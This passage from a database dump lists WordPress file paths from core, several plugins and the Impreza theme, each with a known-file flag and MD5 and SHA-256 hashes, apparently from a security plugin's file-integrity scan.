(0xa3f26121f1aede7807b37a2a791757e4, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gmaps.php', 0, 0x7ef9a56f177ecc7bd3b3a0995e020c6a, 0x7ef9a56f177ecc7bd3b3a0995e020c6a, 0x5f0b5bbb01ad5f6e1b3647bf5ca144bd21b04a4946c07e6ecc6109ac7bb7d80a, '', 0, '?'),
(0xa405185a68feb1b8cbae55573d314fd0, 'wp-content/plugins/revslider/admin/assets/imports/highlight-showcase/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xa4071e2edd814215bec0784b1291598c, 'wp-includes/ms-default-filters.php', 1, 0x00000000000000000000000000000000, 0x6cf25ce7713083ea488a3b1f1114aa14, 0xb5b1462de3d8636bbb9818085f4103de4c0f4dc48b3905b9ad6599fcd697ae22, '', 0, '?'),
(0xa40c243ae4a01bb27d8d6a1220dadce1, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_disc_full_24px.svg', 0, 0xb788ec051f1bff2bd5931ce9769e3210, 0xb788ec051f1bff2bd5931ce9769e3210, 0xa7a41878f7daae67378cd606812c2e6f3c35135066345de1fd72da064b9d8a10, '', 0, '?'),
(0xa416cc369086e8f37e65aa7bd0222e77, 'wp-includes/widgets/class-wp-widget-recent-comments.php', 1, 0x00000000000000000000000000000000, 0xc121d0d9b1db20f4fa7bfa6f284833fa, 0x8b9ffdba6a7eb284be75aa76eef7c72b81b282bab8b56255e138dc7504100078, '', 0, '?'),
(0xa42a4f2da14ccf84aac2e20d5b7fdb75, 'wp-admin/css/about-rtl.css', 1, 0x00000000000000000000000000000000, 0x0e042d73816458bd697aad16c3949840, 0x94f97fcba55a2d23a7a5c68d8a6168c9b72968aa17a05267c0b66c3954900eee, '', 0, '?'),
(0xa42ce149f415ad5baedbe3d464221edc, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-row.php', 0, 0xf1a1f9d872dff3f9c496a9893c2c713e, 0xf1a1f9d872dff3f9c496a9893c2c713e, 0x6ec3c5717ba2b1631c50ef3b5eac4d999225b2b9ab90df546aeb7e05042b724c, '', 0, '?'),
(0xa432bac9caf3f85c84f7ae8226e4c4d1, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-be_BY.po', 1, 0x00000000000000000000000000000000, 0x539fb76b406f6388a4749de12220fd8a, 0x1cde4179ede36810f1d45cb2b45654d5f4a5c53faee4644ee51952a6cc3a1f4d, '', 0, '?'),
(0xa43f3f6ebfebe6e5fde55f326790b76a, 'wp-includes/js/wp-util.js', 1, 0x00000000000000000000000000000000, 0x2c02aa97431dfcc81a82c8f83ab1cd3b, 0xd55c5d0515dfe79a0af8742cee2560c7fbfa401cd0a114b6ffa65f23b60faee7, '', 0, '?'),
(0xa442c8be6ad369416289e7e8fdf7ddac, 'wp-content/plugins/js_composer/include/templates/editors/partials/backend_controls.tpl.php', 0, 0xc5f8d7833a75e8938b5c5344e6825f9b, 0xc5f8d7833a75e8938b5c5344e6825f9b, 0x5872d2402c6ea366d49bd27969b10909b2f363851a9459c85ecf9e84841928ba, '', 0, '?'),
(0xa4452c11c2557575afdb4507de743636, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-handshake.svg', 0, 0xeb55fb5099af893ebe9a5ad676422487, 0xeb55fb5099af893ebe9a5ad676422487, 0x6d16ac2d9c34f7d1820fc464cf0fc99c93bdaf33702e3678110cee444c545bda, '', 0, '?'),
(0xa4466c8ad856f18cebd9544755ad60b6, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.po', 1, 0x00000000000000000000000000000000, 0x523461aa76b9aea77ab194e9bd98479d, 0xbcfee329dee7784242d7509f60b34afb14b6c959df62ab106584fac992869787, '', 0, '?'),
(0xa4542c52ef050cd3de7bea6c6a1bb395, 'wp-content/plugins/revslider/public/assets/assets/svg/file/ic_cloud_done_24px.svg', 0, 0x4b2e9ff204a60038a9e56095d82018aa, 0x4b2e9ff204a60038a9e56095d82018aa, 0xb5326c2f56e8877361ec8327d1ad3b7679e7a8168192c8166b97c00cbca86d54, '', 0, '?'),
(0xa45967e1f9247ac948e12e0459e91be1, 'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php', 1, 0x00000000000000000000000000000000, 0xee758713e94483a7cf7e466502e20955, 0x3b0aa9c5d30406c06588a886aad840648a7786a4ccf6a5f4036034670d86f9b2, '', 0, '?'),
(0xa4617d2611c356c680efc7dbfe08688e, 'wp-content/themes/Impreza/framework/config/google-fonts.php', 0, 0xac1ad8e29c589d69b69b5de4b294e97f, 0xac1ad8e29c589d69b69b5de4b294e97f, 0x99aecaa11bce2b9e995b95ca6fd189d0712da32b90fd0d7a05f719d97d57aa7a, '', 0, '?'),
(0xa4974d97470126216c36ce22c70da90f, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-image-carousel.svg', 0, 0xf51b914bae089dee49cf8674e7abf24d, 0xf51b914bae089dee49cf8674e7abf24d, 0xe71c8ce38607ed12fefb74951b1a46d0a184b852905802efee2ff63ea99c91c3, '', 0, '?'),
(0xa4a501131bc54c618ab96fbeff842437, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/steering-wheel.svg', 0, 0xa0d0152537d70097c42f83fd03130441, 0xa0d0152537d70097c42f83fd03130441, 0x0e18948c0357e8a2db2dbbd3c74fad3c24908f19c28a0fac871e7e57b8f8de01, '', 0, '?'),
(0xa4dd80a69a8933088d15fff989db88c9, 'wp-content/plugins/wordfence/modules/login-security/css/admin.1579191227.css', 1, 0x00000000000000000000000000000000, 0x53a2257623290e9286dda935a8ad21ef, 0x42d5ed971f69840878ddc7fa839b9a75030aa21b0831dc8ecdba3299807b9218, '', 0, '?'),
(0xa4e70affc152b262f086d278fdfaa167, 'wp-includes/css/dist/block-library/editor-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xcfe89277798e51f685aafac401edfe72, 0xb23f5eda1af1242b312d74983db7275957b6c3034a0c97a535680fa9f5334eea, '', 0, '?'),
(0xa4eaf47c1b40d0bad1b6afc8bd316a4a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/euro.svg', 0, 0xa399bd58e1628e55b57b842cc114128e, 0xa399bd58e1628e55b57b842cc114128e, 0x01c209ad3f2dc27c2a7f4aa3075faafa0a44e6f4cabbc4408f2a219089a51d52, '', 0, '?'),
(0xa4eb5ca4f7e335aa429e2108e94568e8, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_4_24px.svg', 0, 0x7eade86ac4bd70cb612ad3adac03c2b7, 0x7eade86ac4bd70cb612ad3adac03c2b7, 0x602e8fec33da62f5846cc6ce961dc66feee26480340241e346b0e96e4a20bc82, '', 0, '?'),
(0xa4fc59a400290d2f6a18f1a929f44172, 'wp-includes/customize/class-wp-customize-filter-setting.php', 1, 0x00000000000000000000000000000000, 0x12184dddda606616afec00eca96975fb, 0xb400113c0af46a3aa7dc59a3460ebcc21919bf1e64c9fb77ca02b109c9fdc0ac, '', 0, '?'),
(0xa5088ddc01b35c92338cc34bb358c80e, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/jquery-ui-effect.min.js', 0, 0x4852e169cf6d4300724dcb0799dd0c4a, 0x4852e169cf6d4300724dcb0799dd0c4a, 0x2572e2348dfe6f0a9f38a45b22d78537cd1302273901f3eb2d1560b4e50b01f7, '', 0, '?'),
(0xa50f7b27663ebb54eb27009491534ab2, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_item.php', 0, 0xa8d19afcbba534116a41adfb801a599c, 0xa8d19afcbba534116a41adfb801a599c, 0x8b3692bba650f1f2f11cc37e7bb60d9c705e5a831d2f61f06fd47b4caa3ab878, '', 0, '?'),
(0xa515181eddc9c8e47fbfa553f522254b, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_person_pin_24px.svg', 0, 0x2d4e18307f7cedf39eff92566e22e603, 0x2d4e18307f7cedf39eff92566e22e603, 0xa5c63d2a97c1b9acf72f1dea67d983b50da60097ae67ef125a5d25b4a5cb04e2, '', 0, '?'),
(0xa52f11fe5375f9ec3afa6c075aedce1c, 'wp-content/plugins/revslider/admin/assets/js/edit_layers.js', 0, 0xa6b409dc89604fa7e6d554f6fe61cf9e, 0xa6b409dc89604fa7e6d554f6fe61cf9e, 0x6b8651d0d44c116969e3eaddcb27e99e3455afa879d4913435182c17fd50688d, '', 0, '?'),
(0xa532b079e297771d476e645b29718fd3, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_router_24px.svg', 0, 0x1d768098b38e7ff0a3a153341267f242, 0x1d768098b38e7ff0a3a153341267f242, 0xd3cdd19d76c9b0324f377faefa8a0afd1d8b31ab8a5370bdfed355f029c33347, '', 0, '?'),
(0xa548450dc7b59ac3083a621495a68db3, 'wp-content/themes/Impreza/framework/admin/functions/functions.php', 0, 0xf9d4951dcb7e24f29f10a4517d80ccda, 0xf9d4951dcb7e24f29f10a4517d80ccda, 0x1451b0251d3d3315aa2de9477823d7f10f0906d5f6ed7ea26cae0b9514996bc9, '', 0, '?'),
(0xa5523b6c7a4fe9386d3c3314944e6965, 'wp-admin/user/freedoms.php', 1, 0x00000000000000000000000000000000, 0x1ba6cbb9e2a9d3deb348997492ed692e, 0x7ed0d06cbc2650f017b4167d409d4d1bad2016a4c30ed036348fe8b067447f7a, '', 0, '?'),
(0xa55cc939bca7a18a940b1b0e09006c6a, 'wp-content/themes/Impreza/search.php', 0, 0x4f228d9b1bf885206567f5f38e6df55d, 0x4f228d9b1bf885206567f5f38e6df55d, 0x98e6f17567da03381eefcc7551cf630e5125ed5bfc2345beb7f6c740f4cb42f1, '', 0, '?'),
(0xa56166683d46afd5de54d23afe9336b6, 'wp-admin/includes/class-ftp-sockets.php', 1, 0x00000000000000000000000000000000, 0x1633697b2e83b923ecca04e6caafeeb2, 0xa39c1fe71097554a69d37302d0bb437ca425970c317654ba015c241bb62f6ac2, '', 0, '?'),
(0xa5790b923a3429a289d4021f2e798cf9, 'wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js', 0, 0xb4abce6637f75132424a086b891e9558, 0xb4abce6637f75132424a086b891e9558, 0x5b22b48fa35a67680dc97cec939679b868fad66f0ffce9cf28c59be694c8d6fb, '', 0, '?'),
(0xa58dd9ebf1a73b7ed3b752b73e9ea302, 'wp-includes/class.wp-scripts.php', 1, 0x00000000000000000000000000000000, 0xd4cb3c87c70f2aed6dc220a7678b2a50, 0xb8e0887314371272233bf744cba8827109b091d6ac78d5b09fffd16e9658fb97, '', 0, '?'),
(0xa58ffc6e7670ac6584edc6d0eeca7de8, 'wp-admin/js/customize-controls.js', 1, 0x00000000000000000000000000000000, 0x2e1c867bb53db1bd8c61c325f62779d1, 0xcaff04e2e5026ff966ff107f86d71bcbb7c4170a10f9c12396a0ffb9049b13cc, '', 0, '?'),
(0xa5a6196ec27ed4a5f0a37eb1ad9da43f, 'wp-content/plugins/js_composer/config/social/shortcode-vc-facebook.php', 0, 0x1ec71d6ea5eb081505405ff41f56b556, 0x1ec71d6ea5eb081505405ff41f56b556, 0xdb45773f0704899364f426d734320d3ab4048f25cfd6b8314e5ce0d158752db2, '', 0, '?'),
(0xa5c019f72c5d803e9adbb180a1cc8f68, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_language_24px.svg', 0, 0xcf4e854420c7a9678aa93be6da2b4da4, 0xcf4e854420c7a9678aa93be6da2b4da4, 0x9c32410c0b1210934c05cd0ce41bdf8718324f799289821e9bb7a6a01b97b4c5, '', 0, '?'),
(0xa5c58b51f53ee14e66ad337753e5e527, 'wp-content/plugins/js_composer/include/helpers/helpers.php', 0, 0xaa951b9f5324b58e83b11e33ab1063ee, 0xaa951b9f5324b58e83b11e33ab1063ee, 0x17d4a29c95a8e03e244a54420b2c424ef936f17d6d5735e6b4305c23e50fee2c, '', 0, '?'),
(0xa5ce50c224070cc66b9c5bfd8f0d025b, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_rv_hookup_24px.svg', 0, 0x55be17390699a772ab6d37448822e043, 0x55be17390699a772ab6d37448822e043, 0x24304d5b12aacd272bb1600eb0b64207c597b375fb369da85b5290b4b659b3a4, '', 0, '?'),
(0xa5d420ed5c8fb9dec28594546e80915d, 'wp-includes/Requests/IDNAEncoder.php', 1, 0x00000000000000000000000000000000, 0xd77dada232f0079b1412e0d050b4d8b1, 0xdc014d3ffd7e22c8cd7525c55bfe2c906ca48b1d89fa2b3f462d7db14d16298c, '', 0, '?'),
(0xa5dafce6aa70203edc97fb2c0c364d7f, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_mode_comment_24px.svg', 0, 0xfd0f1abaec20ebab24e1b45632965fa6, 0xfd0f1abaec20ebab24e1b45632965fa6, 0x70c9daa962dc9aef3959700b40fa47effa6b8b9745527165b4e189d080cda791, '', 0, '?'),
(0xa5f337e407fc378dde96f1c0ef97b97a, 'wp-content/plugins/js_composer/config/content/shortcode-vc-video.php', 0, 0xc7abca401ed6f3075bbb3295602181c6, 0xc7abca401ed6f3075bbb3295602181c6, 0x770e1dfda307511a76ed0940b1c82c8145a7ead326bb95a109f31b309a0ffca6, '', 0, '?'),
(0xa614db1a818c8f33d5489a7befc7b282, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php', 1, 0x00000000000000000000000000000000, 0x72dc20089eb4a5cfaccafe6e2b17a36e, 0x5ec171dc1c4ea4d7e881d7d0a2de1d8326794ea27e8f2753042f2f3e7df29770, '', 0, '?'),
(0xa6165b50574c9ec20a97aee4e6510d05, 'wp-content/plugins/wordfence/modules/login-security/css/login.1579191227.css', 1, 0x00000000000000000000000000000000, 0x6da2e8b6e1b38088cc328ee9d6726d56, 0xbea0af72b9ac914a5d047336c538aec298322119e5ea1a700847c20fc2c4faef, '', 0, '?'),
(0xa6233ac1f6cc536bab55b982e27bc01f, 'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php', 1, 0x00000000000000000000000000000000, 0x2ac13ae83f91ee6c5d9dbcb6f1e77504, 0x3250e6d6ed839aa7d03d773d899d0f374105727fa70afd6651fac27e2cb7af42, '', 0, '?'),
(0xa628bc7c056ee495c1b473415246e42b, 'wp-includes/js/crop/marqueeHoriz.gif', 1, 0x00000000000000000000000000000000, 0x8cccae9c1ebafdb83be602e4d44c6f0a, 0x157cdedbcd53e2f96508a9937c2ed90619918102152fe951b95988e057aa7d28, '', 0, '?'),
(0xa629048664dea9d9109e2c0778f1d797, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/easy-ticker.js', 0, 0x866768fb2c5152e30079449d8625ac66, 0x866768fb2c5152e30079449d8625ac66, 0xcba8250a07ce54b40531ca91ce43b7b7cea09acb1794bd012d52e9e126f2a2a9, '', 0, '?'),
(0xa6432ad148eae499865b5b170c882cde, 'wp-content/plugins/js_composer/include/classes/settings/class-vc-roles.php', 0, 0x96b0b9f39b990f11af9680fa3cfa6613, 0x96b0b9f39b990f11af9680fa3cfa6613, 0x203c0982d79b4cc145821310c270db61dd9e3b25f4b4ef9871c48590692e808b, '', 0, '?'),
(0xa65b27e92fa314d3fe08a23ba0867f94, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php', 1, 0x00000000000000000000000000000000, 0xee12d011a44432455cfb749a2e2df905, 0xc7550a9c2f6d694d8779452d51ae4d155e850800958b51ee8af8154c39689c54, '', 0, '?'),
(0xa661564723c9e0e0ad8fd11e6ad5e9ab, 'wp-content/themes/Impreza/framework/templates/titlebar.php', 0, 0x541647295a752dd6fe1fb99b8b837359, 0x541647295a752dd6fe1fb99b8b837359, 0x9dd28a2a843595c1ff8c10dbe480436e71a0258c932c1d999a4954a75ca2a60d, '', 0, '?'),
(0xa692affc9e3a5b2662fa5bae6859a9b8, 'wp-includes/images/smilies/icon_razz.gif', 1, 0x00000000000000000000000000000000, 0x395bde77b310909a44b341044dad41da, 0x3ba7a7f250dc315d66e855458dbb3b6051daaefe0a65f45a00104034bf6141e7, '', 0, '?'),
(0xa698533f10be73c69bbad9fcd7ede38a, 'wp-content/plugins/revslider/admin/views/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xa6b9f1887832ff5f2e14eb7e24e22913, 'wp-includes/js/dist/core-data.min.js', 1, 0x00000000000000000000000000000000, 0xb800c3b5370efc6207abaf2a7609edab, 0x0e736fc65d62c7ae1c6af8161d6f510e3b1a73304e7b84ee33ed7b48ca744ae3, '', 0, '?'),
(0xa6cd9dd779b841d840abc13315143757, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Highlight_Box.php', 0, 0x68cdd1cd10b9a4e15d01956f7c51e69b, 0x68cdd1cd10b9a4e15d01956f7c51e69b, 0xbac1eb4cb46666e5749b22824ac18fdd4124b259b8496c34e5377beb7e752e7e, '', 0, '?'),
(0xa6e1bd88cbdb088e06d835663f9e686b, 'wp-includes/widgets/class-wp-widget-media-audio.php', 1, 0x00000000000000000000000000000000, 0x636696c24463a86dfd1b69d049a834c4, 0x73fe16adfee8ab19f6d3e29c60b04c276673e65b5cba5c1dbb5fb3b6b307684c, '', 0, '?'),
(0xa6faba4ccafb38345d921f6d549dcb39, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_tta_section.php', 0, 0x75fe87e9c1458eac2045ca4b9908a6ad, 0x75fe87e9c1458eac2045ca4b9908a6ad, 0x5b46c291f6e81e11a571cc137ad6230da362036b08a8a0fb2d820ce0d1f2096f, '', 0, '?'),
(0xa6fcadf3386039f9d73f42629306d091, 'wp-includes/js/jquery/ui/effect-puff.min.js', 1, 0x00000000000000000000000000000000, 0x0647cd3b8da74c8c9c1fe7a317137773, 0xa5c84814e8e52e8f6cf6bceff6c09171f98badc37f9c374c60c0696dbbc29c5e, '', 0, '?'),
(0xa6fd53825943f44f329be7988dc3ca05, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/plant-money.svg', 0, 0x9b438434a178ff963be17cbec6d2c9f6, 0x9b438434a178ff963be17cbec6d2c9f6, 0x3290b427c9cac9a35a0ce8a9d3cbef444b8b557657d758b62e9fe1317ddfccdd, '', 0, '?'),
(0xa70ac8e09408e017070520e4e9942f59, 'wp-includes/js/dist/data-controls.js', 1, 0x00000000000000000000000000000000, 0x89f88142f4b2f677d730aff3fc3169ea, 0x614ef6e59c692c48e25bd3671a43e0fe212f59454922bbf1d22ef7644c04e1e2, '', 0, '?'),
(0xa71005d628b3dde1f47ef2bea550013b, 'wp-content/themes/Impreza/framework/vendor/wordpress-importer/wordpress-importer.php', 0, 0x3a280bcf3fede2a583de4d6b6e4d0e81, 0x3a280bcf3fede2a583de4d6b6e4d0e81, 0xad448f5fe6bb8eb19751e50d5a39d7b2d89a5bf50d35bf7ea695e40e8fd97ad4, '', 0, '?'),
(0xa713f2198e35ecc57ee0695077c0d0eb, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/apple.svg', 0, 0xb9946ff736b9f5f03ca7e4409606a9a5, 0xb9946ff736b9f5f03ca7e4409606a9a5, 0x510278759bfdfd63e67691d7011cc298efb5f13e81d3c4a0ab9832eea378ecf7, '', 0, '?'),
(0xa732b7d055c238663ce1d6445d0bbfec, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_charging_30_24px.svg', 0, 0xe214f51cc2d97e36360131c1449fd1d0, 0xe214f51cc2d97e36360131c1449fd1d0, 0xa3e1968076380551061cff61c287db289789e5e2e20ce8957782aa49902be77c, '', 0, '?'),
(0xa75188893542575029b2ea7400453bb6, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/slick.js', 0, 0xabcc9d875d057a35e86b6908c7a4d8f7, 0xabcc9d875d057a35e86b6908c7a4d8f7, 0x38c9764aa65d4efad946e8eb22afdd56bf3ed1395056278f52320f96930fe609, '', 0, '?'),
(0xa75fb81ea2df021f9f6618e769e1c1a9, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/images/vc_images_carousel.js', 0, 0xcd8defb2f48b4174f4b65f243180e862, 0xcd8defb2f48b4174f4b65f243180e862, 0x5d32a794d1b55035eee8e4c3884f747034c46cab3fcd0daa1990ceefa0f7aba6, '', 0, '?'),
(0xa763e386cc8eb488240a27409b0df2e8, 'wp-admin/setup-config.php', 1, 0x00000000000000000000000000000000, 0x9dc74b84b7372dcf721bd56a1229be0a, 0xe694bae2f3904d1ad2a290511941cc36bffd03d95baa9f78392e1e2feed427fb, '', 0, '?'),
(0xa76d0fd699379a2cd07d04b60cf16f76, 'wp-includes/css/dist/block-library/theme-rtl.css', 1, 0x00000000000000000000000000000000, 0x765597c3d810bb018d92c6c402830ee1, 0x0089ef8a0bfc8fdf05478be4bba85a1be21e17ff7818d017f8c7652a458fb48b, '', 0, '?'),
(0xa77b231ba6d6dd3cbc986bc90251c873, 'wp-content/plugins/js_composer/include/classes/updaters/class-vc-updater.php', 0, 0x02c7ecf24b975031a397ba83ab7ec0dc, 0x02c7ecf24b975031a397ba83ab7ec0dc, 0x93793f49d9393e39af0b31dc385a60249fce0b17738a129c9d0f9242e27764aa, '', 0, '?'),
(0xa78ddf567f80b374bf53f92d08de16ba, 'wp-content/plugins/wordfence/views/scanner/issue-file.php', 1, 0x00000000000000000000000000000000, 0x3fb37d19c6932efece9c653114f7b255, 0x1e7f4dadf154f10884f4ce7ad9da586084e0aaaa6d9d4fbcf113815d247358ce, '', 0, '?'),
(0xa79a479d18efa320a3cb4cb64666a2a0, 'wp-content/themes/Impreza/framework/functions/helpers.php', 0, 0x73090886685ce39dddbb84afef4a2be1, 0x73090886685ce39dddbb84afef4a2be1, 0x9d08d0aa7433a13604d2fbe97019b6dd0c98b012d2601cea80b06a5169710dcd, '', 0, '?'),
(0xa79c9f4a3180ab4d10df46b0863c0bfe, 'wp-admin/js/tags-box.min.js', 1, 0x00000000000000000000000000000000, 0x580ffdf678912278549e642083a40302, 0x34cd7813128d7de0e6c3594fd27494d76844e6fc2f0b033b42b6f2ea72009713, '', 0, '?'),
(0xa7a8b0dbf78ec684bab2b11f4e42d7ad, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php', 1, 0x00000000000000000000000000000000, 0xc17e644e6340f38e05d24710239de02c, 0xa92e7fc40b224b1c91967c9115f1e65bb6f3b500f4caef173aa7489a2fc63fd8, '', 0, '?'),
(0xa7b551ff150ec155fb9c9575e955893e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_cart_24px.svg', 0, 0xd57c46cad0c8359df14356f7dc3ae5d1, 0xd57c46cad0c8359df14356f7dc3ae5d1, 0xc413b2d49e65e63b6e548186478fa7ec924b6bf8a5600ea71dc6fddf8836cd38, '', 0, '?'),
(0xa7d31d923fda9fa345bfce14b6245046, 'wp-includes/pomo/translations.php', 1, 0x00000000000000000000000000000000, 0xbe2d6fae2d6af4ccd3c19b600ffe7c2b, 0x047fb40f63659cb2cb49a19542270a8af02129832654d0b9b5efe18356f4179f, '', 0, '?'),
(0xa7e8e1fab0369190629d67b73e5faa1b, 'wp-includes/images/wlw/wp-watermark.png', 1, 0x00000000000000000000000000000000, 0x3b9a87754d6ddcad447c89778e93c544, 0x03bd53fdcb0b6e52c027f7a258a75ea41fffe46b68fbbab7d5c991d069e637b4, '', 0, '?'),
(0xa7f5138a956d72bf840fc61638709872, 'wp-content/plugins/js_composer/config/wp/shortcode-vc-wp-pages.php', 0, 0x04c484b3ae5a6631fc63b3565f5988d8, 0x04c484b3ae5a6631fc63b3565f5988d8, 0x56fb3643e8e1e372011ccdac8c29dd243bdb039443ccca18ebb644329b3d3328, '', 0, '?'),
(0xa80268b978d72a28bd26beebc36b4f92, 'wp-content/plugins/wordfence/views/blocking/country-block-map.php', 1, 0x00000000000000000000000000000000, 0xa1759cc1794746a11e2c7b968c58c17a, 0x25d49c7f350496813b1eba9413fba7f605789313885e299f8ba8472885e01f6f, '', 0, '?'),
(0xa802b006cc1b9cc0274b857a8e668ce5, 'wp-includes/customize/class-wp-customize-header-image-setting.php', 1, 0x00000000000000000000000000000000, 0xb58df8941a18aebf3ce957c8d28b2aae, 0x21203dd84687d3721f0d076c5e40c79e4f6acbe86132914423956d6f583588e6, '', 0, '?'),
(0xa80519ed7f3523c12238ad25601f7d7f, 'wp-content/wflogs/template.php', 0, 0x6c43a40c1b64628def2ea7cbb4eb8376, 0x6c43a40c1b64628def2ea7cbb4eb8376, 0x5a5d5b578d128b509a7dc32cfbfebf969e8307372af671e4e10ae3e6c691a1e1, '', 0, '?'),
(0xa8068de0be08c9f3f499a7d7d1dddc48, 'wp-content/themes/Impreza/framework/vendor/usof/functions/interface.php', 0, 0xe8f0b003baa236fa2a463cbc497ff0a6, 0xe8f0b003baa236fa2a463cbc497ff0a6, 0xa8240598456c71f71984f6c6854d60d6ba9284867c607e9bfab8db525df9bc11, '', 0, '?'),
(0xa80d17b266a0019090e668cf38b01521, 'wp-includes/Requests/Exception/HTTP/500.php', 1, 0x00000000000000000000000000000000, 0xc0afa9c66b6d830a094815f2124dffda, 0x464f97a10cff151c02563322f8aaf59cef14d4121ebca3aa150f11216bd050f2, '', 0, '?'),
(0xa810911ba276398562d424131f91134c, 'wp-includes/random_compat/error_polyfill.php', 1, 0x00000000000000000000000000000000, 0x583a2c948d745d37af3dc1fc51a2e145, 0x0f058fe72c9ebb749d005f6792045825342ee0a674509a5dc83e8e4a13543412, '', 0, '?'),
(0xa823d73f8099ef476309c2af6c316517, 'wp-includes/class-wp-theme.php', 1, 0x00000000000000000000000000000000, 0x81e58958c78a61e836764750fab7028a, 0x6e58ad6b346a129b4af0b0c82b2e43498ce40477fa74a1e1750a3e72749f4551, '', 0, '?'),
(0xa8488aa3f5c19c5077e015f0253896c0, 'wp-includes/images/smilies/icon_sad.gif', 1, 0x00000000000000000000000000000000, 0xde4906780fe16fd4d3544d7ae6ed442d, 0xd96235c07968ac398011e4e38d7da005a9eb6fdef40b57ed4983f2b06ea76e91, '', 0, '?'),
(0xa8511808340439e3f31e4c7ad3144ab5, 'wp-content/plugins/wordfence/lib/wfUtils.php', 1, 0x00000000000000000000000000000000, 0x6205b270122614e9088496de9c24dd90, 0x7798462150e9ae0ed6f9f1c0a016b3f9a58a08d29ce5bc064c744b4bac08b59e, '', 0, '?'),
(0xa85858ef8e932acee1210832d67e02c5, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php', 1, 0x00000000000000000000000000000000, 0xa3a3c68c408d93ccef4e605867ddf2bf, 0xff512633c681d55f95832b69bbaa09f675a3e271ca03b391d8492bb93a09494f, '', 0, '?'),
(0xa85bc26ec50f477bc3f927bea2713a9b, 'wp-includes/ms-deprecated.php', 1, 0x00000000000000000000000000000000, 0x65289575d4baf6d2e758dcbd469ada25, 0x6e97b53ec26c064a7c8728f513fc3f001092f0f48185efb398b5501050f5f783, '', 0, '?'),
(0xa85cc7fd0168fb20529f58d53cba43ae, 'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php', 1, 0x00000000000000000000000000000000, 0x9d9bebdf851e9777404c8be54feac152, 0xe09df0abb44546910c6aa984d772b8c48d3b73b3ecce802e663ad6e1cfa4a046, '', 0, '?'),
(0xa86261839432adcacfd85d90bc8a283c, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-twitter.svg', 0, 0x40ad783a07606a5fabbd7ef3af2fa3e7, 0x40ad783a07606a5fabbd7ef3af2fa3e7, 0x8d43dcc0811e2e77bdfcdd828393a89a28cb90f27496b6096b3710a463b38d2c, '', 0, '?'),
(0xa86971e8a9fff6d39b89aa7b1466420b, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subscriptions_24px.svg', 0, 0x2b5e03cb47008b77e9cc29548092105d, 0x2b5e03cb47008b77e9cc29548092105d, 0x5d91c2d73ddb096da9b9c1813077a2df1238497aee3380e6108cf407207fd062, '', 0, '?'),
(0xa86ddd8522fde681859e74970bc62942, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-diagram.svg', 0, 0xd8d2edabb49996925b1bd1a584cda40e, 0xd8d2edabb49996925b1bd1a584cda40e, 0xa2328ca70dc6277d912561d7ef09a5964257cc9d9313e506dee3f2ce7812f65c, '', 0, '?'),
(0xa8a34ad2d797b85f790b7a78c8f7364f, 'wp-admin/network/privacy.php', 1, 0x00000000000000000000000000000000, 0x1cd56b9e7e7b5b60506e17c13efc194f, 0x9ebe6f47d1eb73c804ba1f9cda692a4ac93442fa05251cbb9f8f8bb54f332a9d, '', 0, '?'),
(0xa8acccc880e77e5f71da49b6c45310a1, 'wp-admin/js/password-strength-meter.min.js', 1, 0x00000000000000000000000000000000, 0x831a0bdbf910b4139812e1327c992655, 0x8df1aaacf7053a646c2676116c8403abf621324155d9aba07bc2b6e68b90dfb5, '', 0, '?'),
(0xa8afdf5ce04420fc3efc46142cb587e7, 'wp-admin/menu.php', 1, 0x00000000000000000000000000000000, 0x5c5bb8822b6e9c8e840d998ca955f52d, 0x94afd8b743b25162c93d2173d6d7e1028efa0cb492f456da24e6522bfb4579e5, '', 0, '?'),
